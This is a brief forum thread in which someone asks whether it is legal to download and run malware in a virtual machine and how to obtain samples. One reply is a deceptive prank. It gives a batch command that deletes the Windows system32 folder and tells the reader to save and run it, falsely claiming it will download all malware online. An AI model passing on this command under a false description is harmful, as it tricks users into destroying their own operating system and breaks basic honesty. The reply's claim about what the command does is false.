Is it legal to intentionally download malware and/or viruses and let them run in a VM to see how much it fucks up the operating system in it? If it is, what would be the easiest way for me to aquire such malware and viruses?

Also, any Linux malware would be interesting too.

I think it is legal to download viruses/malware intentionally...I mean, they're just files and in this case you're aware of what you download.

del c:\WINDOWS\system32

save the file as anything.bat (remember to add the .bat extension and save as all files)
double click and it will download automaticly all malware online to your PC .

Those will give you viruses.
